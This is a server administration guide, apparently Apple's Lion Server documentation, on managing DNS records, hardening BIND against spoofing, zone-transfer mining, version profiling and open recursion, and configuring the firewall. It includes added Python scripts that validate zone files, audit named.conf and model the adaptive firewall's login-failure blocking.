Add a service record to a DNS zone


Service (SRV) records are used to define services available on a domain. These records help computers locate a service on a domain.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select DNS.
4. Click Zones.
5. Select the zone this record is to be added to.
6. Click Add Record, then choose Add Service (SRV). This adds the service record to the zone.
7. In the Service Name field, enter the well-known name of the service.
8. From the Service Type pop-up menu, select a service type. If the service type for the service you are providing is not listed, enter the name in the Service Type field. The service you are providing should use a syntax similar to _application protocol name._tcp | _udp.
9. In the Host field, enter the DNS name of the server that is providing the service.
10. To use the fully qualified domain name of the domain server, select the Fully Qualified checkbox.
11. In the Port field, enter the port number for the service you are providing. For example, if you are providing http service, use port 80.
12. In the Priority field, enter a priority number. The priority number is used when multiple hosts are configured for the same service. The priority determines which host is tried first.
13. In the Weight field, enter a weight number. The weight number is used as a relative weight for records with the same priority.
14. In the TXT field, enter additional information about the service. This creates a TXT record for the service.
15. Click Save.
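The fields Server Admin asks for in the primary zone, machine (A), alias (CNAME) and service (SRV) panes map directly onto the lines of a BIND zone file of the kind described under Import a BIND zone file. The script below, an added example and not Apple's code, builds such a file from those fields and first checks the things that silently break a zone (timer values that make secondaries discard the zone, a name that carries both an A and a CNAME, NS/MX/SRV targets that point at an alias, malformed _service._proto names). The example.com data and its 192.0.2.x addresses are constructed.

```python
"""Build a BIND zone file from the same fields Server Admin asks for in the
primary zone, machine (A), alias (CNAME) and service (SRV) panes, and
sanity-check them first. Added example, not Apple's code; the example.com
data below is constructed."""
from dataclasses import dataclass, field
import re

HOUR = 3600                       # Server Admin's Expiration pane counts in hours
SRV_LABEL = re.compile(r'^_[a-z0-9-]+$')


@dataclass
class Zone:
    name: str                     # Primary Zone Name
    admin_mail: str               # zone administrator mail address (SOA RNAME)
    nameservers: list             # Name Servers field, relative or fully qualified
    ttl_h: int                    # Expiration pane: TTL, refresh, retry, expire
    refresh_h: int
    retry_h: int
    expire_h: int
    serial: int = 1
    mx: list = field(default_factory=list)        # (priority, host)
    machines: list = field(default_factory=list)  # (host, ip, (hw, os) or None, comment)
    aliases: list = field(default_factory=list)   # (alias, destination)
    services: list = field(default_factory=list)  # (service, proto, prio, weight, port, host, txt)


def validate(z):
    """Return the problems found; an empty list means the zone passes."""
    problems = []
    if z.retry_h >= z.refresh_h:
        problems.append("retry should be shorter than refresh")
    if z.expire_h < z.refresh_h + z.retry_h:
        problems.append("expire must outlast refresh plus retry or secondaries discard the zone")
    if '@' not in z.admin_mail:
        problems.append("administrator mail address needs an @")
    hosts = {m[0] for m in z.machines}
    ips = [m[1] for m in z.machines]
    if len(ips) != len(set(ips)):
        problems.append("duplicate IP address among machine records")
    alias_names = {a for a, _ in z.aliases}
    for alias, dest in z.aliases:
        if alias in hosts:
            problems.append(f"{alias} cannot carry both an A and a CNAME record")
        if dest not in hosts and not dest.endswith('.'):
            problems.append(f"alias {alias} points at unknown host {dest}")
    # NS, MX and SRV targets must resolve to address records, never to aliases
    targets = list(z.nameservers) + [h for _, h in z.mx] + [s[5] for s in z.services]
    for t in targets:
        if t in alias_names:
            problems.append(f"{t} is a CNAME; NS, MX and SRV targets need an A record")
    for svc, proto, *_ in z.services:
        if not SRV_LABEL.match(svc) or proto not in ('_tcp', '_udp'):
            problems.append(f"service must be named _service._tcp or _service._udp, got {svc}.{proto}")
    return problems


def render(z):
    """Emit the zone file text; each record mirrors the pane it comes from."""
    origin = z.name.rstrip('.') + '.'
    mail = z.admin_mail.replace('@', '.', 1) + '.'

    def fq(host):
        return host if host.endswith('.') else f"{host}.{origin}"

    ns = [fq(h) for h in z.nameservers]
    lines = [f"$TTL {z.ttl_h * HOUR}", f"$ORIGIN {origin}",
             f"@ IN SOA {ns[0]} {mail} ( {z.serial} {z.refresh_h * HOUR} "
             f"{z.retry_h * HOUR} {z.expire_h * HOUR} {z.ttl_h * HOUR} )"]
    lines += [f"@ IN NS {n}" for n in ns]
    lines += [f"@ IN MX {prio} {host}" for prio, host in z.mx]
    for host, ip, hinfo, comment in z.machines:
        lines.append(f"{host} IN A {ip}")
        if hinfo:
            lines.append(f'{host} IN HINFO "{hinfo[0]}" "{hinfo[1]}"')
        if comment:
            lines.append(f'{host} IN TXT "{comment[:255]}"')  # Comments field limit
    lines += [f"{alias} IN CNAME {dest}" for alias, dest in z.aliases]
    for svc, proto, prio, weight, port, host, txt in z.services:
        lines.append(f"{svc}.{proto} IN SRV {prio} {weight} {port} {host}")
        if txt:
            lines.append(f'{svc}.{proto} IN TXT "{txt}"')
    return "\n".join(lines) + "\n"


# Constructed data: one primary zone as it might be entered in Server Admin.
EXAMPLE = Zone(
    name="example.com", admin_mail="hostmaster@example.com", nameservers=["ns1"],
    ttl_h=24, refresh_h=3, retry_h=1, expire_h=168, mx=[(10, "mail")],
    machines=[("ns1", "192.0.2.10", ("Mac mini", "Lion Server"), "Upstairs server closet B"),
              ("mail", "192.0.2.20", None, "")],
    aliases=[("www", "mail")],
    services=[("_ldap", "_tcp", 0, 100, 389, "ns1", "")],
)

if __name__ == '__main__':
    print(validate(EXAMPLE) or render(EXAMPLE))
```

The rendered file can be checked with BIND's own named-checkzone before it is placed in /var/named/ and referenced from a zone directive.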

Change a record in a DNS zone


If you change the namespace for the domain, you must update DNS records as often as that namespace changes. Upgrading hardware or adding to a domain name might also require updating DNS records. You can duplicate a record and then edit it, saving configuration time.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select DNS.
4. Click Zones.
5. Click the triangle at the left of the zone that has the computer record to be edited. The list of records appears.
6. Select the record to be edited and make changes in the fields below the list.
7. Click Save.

Delete a record from a DNS zone


When a computer is no longer associated with a domain name or usable address, delete the associated records.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select DNS.
4. Click Zones.
5. Click the triangle at the left of the zone that has the computer record to be deleted. The list of records appears.
6. Select the record to be deleted and click Remove below the list.
7. Click Save.

Secure DNS

DNS spoofing
DNS spoofing is adding false data to the DNS server's cache. This enables hackers to:
- Redirect real domain name queries to alternative IP addresses. For example, a falsified A record for a bank could point a computer user's browser to a different IP address that is controlled by the hacker. A duplicate website could fool users into giving their bank account numbers and passwords to the hacker. Also, a falsified mail record could enable a hacker to intercept mail sent to or from a domain. If the hacker then forwards that mail to the correct mail server after copying the mail, this can go undetected.
- Prevent proper domain name resolution and access to the Internet. This is the most benign of DNS spoof attacks. It merely makes a DNS server appear to be malfunctioning.

The most effective method to guard against these attacks is vigilance. This includes maintaining up-to-date software and auditing DNS records regularly. If exploits are found in the current version of BIND, the exploits are patched and a security update is made available for Lion Server. Apply all such security patches. Regular audits of your DNS records can help prevent these attacks.


Defend against server mining


Server mining is the practice of obtaining a copy of a complete primary zone by requesting a zone transfer. The attacker pretends to be a secondary server for your primary zone and requests a copy of the zone's records. With a copy of your primary zone, the attacker can see what kinds of services a domain offers and the IP addresses of the servers that offer them, and can then try attacks specific to those services. This is reconnaissance before another attack.

To defend against this attack, specify which IP addresses have permission to request zone transfers (your secondary zone servers) and deny all others. Zone transfers are accomplished over TCP on port 53. To limit zone transfers, block zone transfer requests from anyone but your secondary DNS servers. Note that blocking TCP port 53 at the firewall also blocks ordinary DNS queries that fall back to TCP (for example, when a UDP response is truncated); BIND's allow-transfer option in named.conf restricts transfers alone, and the two controls can be combined. To specify zone transfer IP addresses:

1. Create a firewall filter that permits only IP addresses that are inside your firewall to access TCP port 53.
2. Follow the instructions for configuring firewall rules, using the following settings:
   Packet: Allow
   Port: 53
   Protocol: TCP
   Source IP: the IP address of your secondary DNS server
   Destination IP: the IP address of your primary DNS server


Defend against DNS service profiling


Another common reconnaissance technique is to profile your DNS service. First the attacker requests the BIND version (a CHAOS-class TXT query for version.bind), and the server reports the version of BIND that is running. Then the attacker compares the response to known exploits and vulnerabilities for that version of BIND. To defend against this, configure BIND to respond with something other than its real version. This is obscurity, not a fix: the vulnerabilities remain until the security update is applied. To alter BIND's version response:

1. Open a command-line text editor (for example vi, emacs, or pico).
2. Open named.conf for editing.
3. Inside the options { ... } block of the configuration file, add the following line:
   version "[your text, maybe 'we're not telling!']";
4. Save named.conf. The change takes effect the next time DNS service starts.


Denial of service (DoS) and service piggybacking attacks


Denial of service
This kind of attack is common and easy. An attacker sends so many service requests and queries that the server uses all its processing power and network bandwidth trying to respond, and the overload prevents legitimate use of the service. It is difficult to prevent this type of attack before it begins. Constant monitoring of DNS service and server load lets an administrator catch the attack early and mitigate its damaging effect. The easiest way to guard against this attack is to block the offending IP address with your firewall. Unfortunately, this means the attack is already underway and the attacker's queries are being answered and the activity logged.

Service piggybacking
This attack is done not so much by malicious intruders as by ordinary Internet users who learn the trick from other users. They might feel that the DNS response time with their own ISP is too slow, so they configure their computers to query your DNS server instead of their ISP's. Effectively, more users are accessing the DNS server than were planned for. An open recursive resolver is also a ready amplifier for reflection attacks against third parties. You guard against this by limiting or disabling DNS recursion. If you plan to offer DNS service to your LAN users, they need recursion to resolve domain names, but don't provide this service to Internet users. To prevent recursion entirely, see Enable DNS recursion. The most common balance is to permit recursion for requests coming from IP addresses in your own range and deny it to external addresses. BIND lets you specify this in its configuration file, named.conf. Edit named.conf to include the following:

options {
    ...
    allow-recursion { 127.0.0.0/8; [your internal IP range of addresses, like 192.168.1.0/27]; };
};

For more information, see the BIND documentation.
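The three named.conf settings described in the preceding sections (a version override against profiling, allow-transfer against server mining, and allow-recursion against piggybacking) are easy to forget on one server among many. The following audit script is an added example, not part of Lion Server or BIND: it parses the options block of a named.conf and reports which of the three settings is missing or open to any. The two configurations are constructed samples, and the ACL names internal and secondaries are assumptions.

```python
"""Audit a BIND named.conf for the three Secure DNS settings discussed above.

Added example, not part of Lion Server or BIND: it reads the options block
and reports whether version, allow-transfer and allow-recursion are set.
"""
import re

# Constructed sample: an options block with none of the hardening applied.
WEAK_CONF = """
options {
    directory "/var/named";
    recursion yes;
};
zone "example.com" {
    type master;
    file "example.com.zone";
};
"""

# Constructed sample: the hardened counterpart (ACL names are assumptions).
HARDENED_CONF = """
acl internal { 127.0.0.0/8; 192.168.1.0/27; };
acl secondaries { 192.168.1.5; };
options {
    directory "/var/named";
    version "we're not telling!";
    allow-recursion { internal; };
    allow-transfer { secondaries; };
};
"""


def options_block(conf):
    """Return the text inside the top-level options { ... } block ('' if absent)."""
    m = re.search(r"(?<![\w-])options\s*\{", conf)
    if not m:
        return ""
    depth, i = 1, m.end()
    while i < len(conf) and depth:
        depth += {"{": 1, "}": -1}.get(conf[i], 0)
        i += 1
    return conf[m.end():i - 1]


def statement(block, name):
    """Return the value of `name value;` or `name { ...; };` in block, or None.

    The lookbehind keeps `recursion` from matching inside `allow-recursion`.
    """
    pattern = r"(?<![\w-])%s\s*(\{[^}]*\}|[^;{]+)\s*;" % re.escape(name)
    m = re.search(pattern, block)
    return m.group(1).strip() if m else None


def acl_members(value):
    """Split `{ a; b; }` into ['a', 'b']."""
    return [t.strip() for t in value.strip("{} \n").split(";") if t.strip()]


def audit(conf):
    """Return the names of the settings that leave the server exposed."""
    opts = options_block(conf)
    findings = []
    # Profiling: without a version override BIND answers version.bind honestly.
    if statement(opts, "version") is None:
        findings.append("version")
    # Server mining: no allow-transfer, or one containing any, permits AXFR to everyone.
    transfer = statement(opts, "allow-transfer")
    if transfer is None or "any" in acl_members(transfer):
        findings.append("allow-transfer")
    # Piggybacking: recursion enabled with no allow-recursion list is an open resolver.
    if statement(opts, "recursion") != "no":
        recursion = statement(opts, "allow-recursion")
        if recursion is None or "any" in acl_members(recursion):
            findings.append("allow-recursion")
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, "->", audit(conf) or "no findings")
```

Run it against the text of your own named.conf (for example by reading the file into a string and calling audit) after each change Server Admin or a manual edit makes; an empty result means all three settings are present and none of them is open to any.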

Common DNS administration tasks

Configure DNS for Mail service


Configuring DNS for mail service involves creating MX records in DNS for your mail servers. If your ISP provides DNS service, contact the ISP so they can enable your MX records. Follow these steps only if you provide your own DNS service. You might want to set up multiple servers for redundancy. If so, create an MX record for each auxiliary server.

1. Open Server Admin and connect to the server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select DNS.
4. Click Zones.
5. Select the zone this record is to be added to.
6. Click the triangle at the left of the zone. The list of records appears.
7. Click Add Record, then choose Add Machine (A). This adds a machine record to the zone.
8. In the Machine Name field, enter the host name of the computer. To use the fully qualified name of the computer, select the Fully Qualified checkbox and enter the fully qualified domain name. This field is the basis for the A record of the computer. Reverse lookup pointer (PTR) records are created for the computer.
9. Click the Add button (+) and enter the IP addresses for the computer.
10. In the relevant text boxes, enter information about the hardware and software of the computer. If this computer handles mail for the zone, also select the mail server checkbox on the machine record; that selection is what creates the MX record (see Host several Internet services with a single IP address).
11. In the Comment text box, enter comments about the computer. This field is the basis for the TXT record of the computer. You can store up to 255 ASCII characters in the comment text box. You can include the physical location of the computer (for example, Upstairs server closet B), the computer's owner (for example, John's Computer), or any other information about the computer. Remember that TXT records are publicly readable; don't put anything there that you would not want an attacker doing reconnaissance to see.
12. Click Save.
13. To add other names that you want this computer to have, click Add Record and choose Add Alias (CNAME). Add as many aliases as you want for your server.
14. In the Alias Name field, enter the alternate name for your computer. To use the fully qualified name for the alias, select the Fully Qualified checkbox and enter the fully qualified domain name. This field is the basis for the CNAME records of the computer.
15. In the Destination field, enter the computer name you are creating the alias for. To use the fully qualified name for the destination, select the Fully Qualified checkbox and enter the fully qualified domain name.
16. Click Save.
17. From the expanded Servers list, select Mail.
18. Click Settings, then click Advanced.
19. Click Hosting.
20. Next to the Local Host Aliases field, click the Add button (+).
21. In the Local Host Alias field, enter the alias name you created earlier.
22. Click OK, then click Save.
23. Repeat steps 7 through 22 for each mail server.


Set up namespace behind a NAT gateway


If you're behind a NAT gateway, you have a set of IP addresses that are usable only in the NAT environment. If you were to assign domain names to these addresses outside the NAT gateway, none of the domain names would resolve to the correct computer. For more information about NAT, enter NAT in the help search field.

However, you can run DNS service behind the gateway, assigning host names to NAT IP addresses. This way, if you're behind the NAT gateway, you can enter domain names rather than IP addresses to access servers, services, and workstations. Your DNS server should also have a forwarding zone that sends DNS requests outside the NAT gateway, so that names outside the routed area resolve. Your clients' network settings should specify the DNS server behind the NAT gateway. The process of setting up one of these networks is the same as setting up a private network. For more information, see Link a LAN to the Internet through one IP address.

If you set up a namespace behind the NAT gateway, names entered by users outside the gateway won't resolve to addresses behind it. Set the DNS records outside the NAT-routed area to point to the NAT gateway and use NAT port forwarding to reach computers behind the gateway. For more information, see Configure port forwarding.

Lion's Multicast DNS feature permits you to use host names ending in .local on your local subnet without enabling DNS. Any service or device that supports Multicast DNS permits the use of a user-defined namespace on your local subnet without setting up and configuring DNS.


Network load distribution (round robin)


BIND permits simple load distribution using an address-shuffling method known as round robin. You set up a pool of IP addresses for several hosts mirroring the same content, and BIND cycles the order of these addresses as it responds to queries. Round robin can't monitor current server load or processing power; it only cycles the order of an address list for a given host name.

You enable round robin by adding multiple IP address entries for a given host name. For example, suppose you want to distribute web server traffic among three servers on your network that all mirror the same content, with the IP addresses 192.168.12.12, 192.168.12.13, and 192.168.12.14. You would add three machine records with three IP addresses, each with the same domain name.

When DNS service encounters multiple entries for one host, its default behavior is to answer queries by sending the list in a cycled order. The first request gets the addresses in the order A, B, C; the next request gets B, C, A; then C, A, B; and so on. To limit the effect of caching by resolvers, which keep using the order they received until the record expires, keep the zone's time-to-live (TTL) fairly short. A failed server is not removed from the rotation: round robin distributes load but does not provide failover.


Host several Internet services with a single IP address


You can have one server that supplies all Internet services (such as mail or web). These services can run on one computer with a single IP address. You can have multiple host names in the same zone for a single server. For example, you might want the domain name www.example.com to resolve to the same IP address as ftp.example.com or mail.example.com. The domain appears to be several servers to anyone accessing the services, but they are all one server at one IP address.

Setting up DNS records for this is easy: add aliases to the machine's DNS record. Setting up DNS names for these services does not enable or configure the services; it provides easy-to-remember names for each service offered, which can simplify setup and configuration of the client software for each service. For example, for every service you want to expose, do the following:

Create mail.example.com to enter in mail clients. Be sure to select the mail server checkbox on the machine pane. An MX record must point at a host name that has an A record, not at an alias, so the MX is tied to the machine record and the alias serves only client configuration.
Create www.example.com to enter in web browsers.
Create afp.example.com for Apple File Sharing in the Finder.
Create ftp.example.com to enter in FTP clients.

As your needs grow, you can add computers to the network to handle these services. Then remove the alias from the machine's DNS record and create a record for the new machine, and your clients' settings can remain the same.


Host multiple domains on the same server


One server can supply all Internet services (such as mail or web) for several domain names. For example, the domain name www.example.com can resolve to the same IP address as www.server.org. The domains appear to be separate servers, but they are all one server at one IP address. Setting up DNS records for this is easy: add a DNS zone and then add host names and server information to that zone. Setting up DNS names for these services does not enable or configure the service for the domain names; this configuration is used with virtual domain hosting in mail and web services.


Configure a client to use your DNS server


You can configure clients to use a DNS server to convert Internet names to IP addresses so you don't need to know the IP address of a server you are trying to reach.

1. Choose Apple > System Preferences, then click Network.
2. From the services list, select the network connection service you use to connect to the Internet (such as Ethernet).
3. In the DNS Server field, enter the IP address of the primary DNS server you want to use. To enter addresses for several servers, separate the addresses with commas. To find out which DNS server you should be using, check with your network administrator. If the client gets its address from DHCP, the DNS server addresses are normally supplied by DHCP service.


Find more DNS information


For more information about DNS and BIND, see the following:

DNS and BIND, 5th edition, by Paul Albitz and Cricket Liu (O'Reilly and Associates, 2006)
The Internet Systems Consortium website: www.isc.org and www.isc.org/sw/bind
Request for Comments (RFC) documents provide an overview of a protocol or service and explain how the protocol should behave. If you're a novice server administrator, you'll probably find some of the background information in an RFC helpful. If you're an experienced server administrator, you can find technical details about a protocol in its RFC document. You can search for RFC documents by number at http://www.ietf.org/rfc.html.
A, PTR, CNAME, MX: see RFC 1035.
AAAA: see RFC 1886 (since obsoleted by RFC 3596).

Firewall service

Understanding firewalls

About Firewall service


Services such as web and FTP are identified on your server by a TCP or User Datagram Protocol (UDP) port number. When a computer tries to connect to a service, Firewall service scans the rule list for a matching port number.

When a packet arrives at a network interface and the firewall is enabled, the packet is compared to each rule, starting with the lowest-numbered (highest-priority) rule. When a rule matches the packet, the action specified in the rule (such as permit or deny) is taken. Then, depending on the action, more rules can be applied. The rules you set are applied to TCP packets and UDP packets. In addition, you can set up rules for restricting Internet Control Message Protocol (ICMP) or Internet Group Management Protocol (IGMP) using advanced rule creation.

Important: When you start Firewall service the first time, only ports essential to remote administration of the server are open, including secure shell (22) and several others. Other ports are dynamically opened to permit specific responses to queries initiated from the server. To permit remote access to other services on your computer, open more ports using the Services section of the Settings pane.

If you plan to share data over the Internet and you don't have a dedicated router or firewall to protect your data from unauthorized access, use Firewall service. This service works well for small to medium businesses, schools, and small or home offices. Large organizations with a firewall can use Firewall service to exercise a greater degree of control over their servers. For example, workgroups in a large business, or schools in a school system, can use Firewall service to control access to their own servers.

Firewall service also provides stateful packet inspection, which determines whether an incoming packet is a legitimate response to an outgoing request or part of an ongoing session. This permits packets that would otherwise be denied.


Understanding IP addressing
Understanding firewall rules requires understanding how IP addressing works.

IP address
IPv4 addresses consist of four segments with values between 0 and 255 (the range of an 8-bit number), separated by dots (for example, 192.168.12.12). The segments in IP addresses go from general to specific. For example, the first segment might belong to all computers in a company and the last segment might belong to a specific computer on one floor of a building.

Address ranges
When you create an address group using Server Admin, you enter an IP address and a subnet mask. The three types of address notation permitted are:
A single address: 192.168.2.1
A range expressed with CIDR notation: 192.168.2.1/24
A range expressed with netmask notation: 192.168.2.1:255.255.255.0
Server Admin shows the resulting address range. You can change the range by changing the subnet mask. When you indicate a range of potential values for any segment of an address, that segment is called a wildcard. The following table gives examples of address ranges created to achieve specific goals.

Goal: Create a rule that specifies a single IP address.
    Example IP address: 10.221.41.33
    Enter this in the address field: 10.221.41.33 or 10.221.41.33/32
    Address range affected: 10.221.41.33 (single address)

Goal: Create a rule that leaves the fourth segment as a wildcard.
    Example IP address: 10.221.41.33
    Enter this in the address field: 10.221.41.33/24
    Address range affected: 10.221.41.0 to 10.221.41.255

Goal: Create a rule that leaves part of the third segment and all of the fourth segment as a wildcard.
    Example IP address: 10.221.41.33
    Enter this in the address field: 10.221.41.33/22
    Address range affected: 10.221.40.0 to 10.221.43.255

Goal: Create a rule that applies to all incoming addresses.
    Enter this in the address field: Select Any
    Address range affected: All IP addresses

Multiple IP addresses
A server can have multiple (multihomed) IP addresses, but Firewall service applies one set of rules to all server IP addresses. If you create multiple alias IP addresses, the rules you create apply to all of those IP addresses.


Using address ranges


When you create an address group using Server Admin, you enter an IP address and a subnet mask. The three types of address notation permitted are:
A single address: 192.168.2.1
A range expressed with CIDR notation: 192.168.2.1/24
A range expressed with netmask notation: 192.168.2.1:255.255.255.0
Server Admin shows the resulting address range. You can change the range by changing the subnet mask. When you indicate a range of potential values for any segment of an address, that segment is called a wildcard. The following table gives examples of address ranges created to achieve specific goals.

Goal: Create a rule that specifies a single IP address.
    Example IP address: 10.221.41.33
    Enter this in the address field: 10.221.41.33 or 10.221.41.33/32
    Address range affected: 10.221.41.33 (single address)

Goal: Create a rule that leaves the fourth segment as a wildcard.
    Example IP address: 10.221.41.33
    Enter this in the address field: 10.221.41.33/24
    Address range affected: 10.221.41.0 to 10.221.41.255

Goal: Create a rule that leaves part of the third segment and all of the fourth segment as a wildcard.
    Example IP address: 10.221.41.33
    Enter this in the address field: 10.221.41.33/22
    Address range affected: 10.221.40.0 to 10.221.43.255

Goal: Create a rule that applies to all incoming addresses.
    Enter this in the address field: Select Any
    Address range affected: All IP addresses
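The ranges in the table above (and in the identical table under Understanding IP addressing) are what Server Admin computes from the address and mask you type. The script below is an added example, not Apple's code: it accepts the three notations listed above plus the Any selection, reproduces the table's ranges with Python's standard ipaddress module, and lets you check whether a given source address would fall inside a rule's range before you commit the rule.

```python
"""Compute the address range Server Admin shows for an address-group entry.

Added example (not Apple's code): it accepts the three notations listed
above and reproduces the table's ranges with the standard ipaddress module.
"""
import ipaddress


def parse_entry(entry):
    """Return an ip_network for a single address, CIDR, addr:netmask, or 'any' entry."""
    entry = entry.strip()
    if entry.lower() == "any":
        return ipaddress.ip_network("0.0.0.0/0")
    if ":" in entry and "." in entry:
        # Server Admin's netmask notation, e.g. 192.168.2.1:255.255.255.0 (IPv4 only)
        addr, mask = entry.split(":", 1)
        return ipaddress.ip_network(f"{addr}/{mask}", strict=False)
    # Plain address (a /32) or CIDR; strict=False keeps host bits, as Server Admin does
    return ipaddress.ip_network(entry, strict=False)


def address_range(entry):
    """Return (first, last) address strings covered by the entry."""
    net = parse_entry(entry)
    return str(net[0]), str(net[-1])


def entry_covers(entry, address):
    """True if `address` falls inside the range that `entry` denotes."""
    return ipaddress.ip_address(address) in parse_entry(entry)


if __name__ == "__main__":
    for entry in ("10.221.41.33", "10.221.41.33/32", "10.221.41.33/24",
                  "10.221.41.33/22", "192.168.2.1:255.255.255.0", "any"):
        first, last = address_range(entry)
        print(f"{entry:28} {first} to {last}")
```

The /22 row is the one people get wrong by hand: the mask clears the low two bits of the third segment, so 10.221.41.33/22 reaches from 10.221.40.0 to 10.221.43.255, two /24s on either side of the address you typed.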


Using Firewall service with NAT


You must enable the firewall to use NAT. Enabling NAT creates a divert rule in the firewall configuration. Although Server Admin permits NAT service and Firewall service to be enabled and disabled independently, NAT service can operate only if both NAT and Firewall services are enabled. An essential part of NAT is the packet divert rule used in the firewall. The firewall rule you set up instructs the firewall how to route network traffic coming from the network behind the NAT gateway. When you have a LAN behind a NAT gateway, you must create or know the address group that corresponds to the LAN.


Adaptive firewall
Lion Server uses an adaptive firewall that dynamically generates a firewall rule when a user or an IP address generates 10 consecutive failed login attempts.

About the adaptive firewall
The adaptive firewall helps prevent your computer from being attacked by unauthorized users. It requires no configuration and is active when you turn on your firewall. When an address makes too many failed attempts in too short a period, the adaptive firewall creates a temporary rule for ipfw and ip6fw that blocks that address's network activity. After a set period, the temporary rule is removed and ipfw and ip6fw return to their normal set of rules. By default, the generated rule blocks the offending IP address for 15 minutes. The block applies to anyone behind that address, including an administrator who mistypes a password 10 times, so add your management hosts to the whitelist. Because the block is temporary and keyed to the source address, an attacker who spreads attempts across many addresses or waits out the block is slowed, not stopped; treat the adaptive firewall as a complement to strong credentials, not a substitute.

Although the adaptive firewall engages automatically, an administrator can customize its reaction by:
Adding an IP address or address range permanently to a whitelist
Adding an IP address or address range permanently to a blacklist
Changing the blocking time period
Changing the adaptive firewall's reporting behavior

Adaptive firewall files and utilities
The adaptive firewall consists of the following parts:

/usr/libexec/afctl    The executable
/etc/af.plist    The plist-format configuration file for afctl
/System/Library/LaunchDaemons/com.apple.afctl.plist    The launchd plist for afctl
/var/db/af/whitelist    The file that stores the whitelist
/var/db/af/blacklist    The file that stores the list of blocked addresses
/System/Library/CoreServices/AdaptiveFirewall.bundle/Contents/MacOS/hb_summary    A tool that summarizes the host blocking activity of afctl

For more information, see the man pages for afctl and hb_summary.
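To see what the trigger described above does with real input, the following script is an added example, not Apple's afctl: it reads sshd-style log lines, counts consecutive failed logins per source address, and produces a 15-minute block the moment an address reaches 10, resetting the count on a successful login and ignoring attempts that arrive while the address is already blocked. The log lines are constructed data; the addresses, user names and timestamps are invented for the example.

```python
"""Reproduce the adaptive firewall's trigger on sample log lines.

Added example, not Apple's afctl: it counts consecutive failed logins per
source address and emits a 15-minute block once the count reaches 10, which
is what the adaptive firewall does by default.
"""
import re
from dataclasses import dataclass
from datetime import datetime, timedelta

THRESHOLD = 10                      # consecutive failures that trigger a block
BLOCK_FOR = timedelta(minutes=15)   # default blocking period

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} \d{2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for \S+ from (?P<ip>\S+) port \d+"
)


@dataclass
class Block:
    ip: str
    start: datetime
    end: datetime


def _line(t, pid, result, user, ip, port):
    return f"{t:%b %d %H:%M:%S} server sshd[{pid}]: {result} password for {user} from {ip} port {port} ssh2"


def constructed_log():
    """Build sshd-style lines (constructed data, not a real log).

    203.0.113.7 fails 12 times in a row; 198.51.100.9 fails 4 times, succeeds,
    then fails 4 more, so it never reaches 10 consecutive failures.
    """
    lines = []
    t = datetime(2011, 9, 3, 10, 0, 0)
    for i in range(12):
        lines.append(_line(t, 400 + i, "Failed", "root", "203.0.113.7", 5000 + i))
        t += timedelta(seconds=2)
    for i in range(4):
        lines.append(_line(t, 500 + i, "Failed", "alice", "198.51.100.9", 6000 + i))
        t += timedelta(seconds=5)
    lines.append(_line(t, 510, "Accepted", "alice", "198.51.100.9", 6010))
    for i in range(4):
        t += timedelta(seconds=5)
        lines.append(_line(t, 520 + i, "Failed", "alice", "198.51.100.9", 6020 + i))
    return lines


def is_blocked(blocks, ip, at):
    """True if a temporary rule for ip is in force at time `at`."""
    return any(b.ip == ip and b.start <= at < b.end for b in blocks)


def detect(lines, year=2011):
    """Return the blocks the adaptive firewall would generate, in order."""
    streak = {}       # ip -> consecutive failures so far
    blocks = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue           # unrelated log line
        when = datetime.strptime(m["ts"], "%b %d %H:%M:%S").replace(year=year)
        ip = m["ip"]
        if m["result"] == "Accepted":
            streak[ip] = 0     # a success breaks the run of failures
            continue
        if is_blocked(blocks, ip, when):
            continue           # already blocked: ipfw would have dropped the packet
        streak[ip] = streak.get(ip, 0) + 1
        if streak[ip] >= THRESHOLD:
            blocks.append(Block(ip, when, when + BLOCK_FOR))
            streak[ip] = 0     # a second block requires a fresh run of failures
    return blocks


if __name__ == "__main__":
    for b in detect(constructed_log()):
        print(f"block {b.ip} from {b.start:%H:%M:%S} until {b.end:%H:%M:%S}")
```

The same loop, pointed at /var/log/secure.log, shows you which addresses afctl would have blocked and when; compare its output with hb_summary to confirm the adaptive firewall is actually reacting on your server.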


About IPv6 firewall rules


When you configure and use Firewall service in Server Admin, by default ipfw and ip6fw are started. However, all IPv6 traffic except local traffic is blocked. You can override the IPv6 rules with the ip6fw tool, but after Firewall service or the server restarts, your rules are overwritten.

Using Server Admin, you control how Firewall service manages the IPv6 firewall with the following two keys in /etc/ipfilter/ip_address_groups.plist:

    <key>IPv6Mode</key>
    <string>DenyAllExceptLocal</string>
    <key>IPv6Control</key>
    <true/>

The IPv6Mode key controls which IPv6 rules are applied. It has three possible settings:

DenyAllExceptLocal
DenyAll
NoRules

By default, IPv6Mode is set to DenyAllExceptLocal. This setting applies the following rules, which deny all IPv6 traffic except local traffic (loopback, link-local multicast to ff02::/16, and UDP port 626):

    add 1 allow udp from any to any 626
    add 1000 allow all from any to any via lo0
    add 1100 allow all from any to ff02::/16
    65000 deny ipv6 from any to any

If you set IPv6Mode to DenyAll, only the following rule is applied, blocking all IPv6 traffic:

    65000 deny ipv6 from any to any

If you set IPv6Mode to NoRules, no rules are created for IPv6. If your network is entirely IPv6, you might want to use this setting, create override rules with the ip6fw tool, and write a script that reapplies the rules when Firewall service or the server restarts. Be aware that with NoRules, IPv6 traffic is unfiltered until that script has run.

The IPv6Control key is a Boolean that determines whether ip6fw starts and stops along with ipfw. If the value is true, ip6fw starts and stops when ipfw starts or stops. If the value is false, only ipfw starts or stops. By default the value is true.


Common network administration tasks that use Firewall service


This section describes common uses of Firewall service in network administration. Your firewall is the first line of defense against unauthorized network intruders, malicious users, and network virus attacks that can harm data or abuse network resources.

Controlling or enabling peer-to-peer network usage
Sometimes network administrators must control the use of peer-to-peer (P2P) file sharing applications. Such applications might use network bandwidth and resources improperly or disproportionately. P2P file sharing might also pose a security or intellectual property risk for a business.

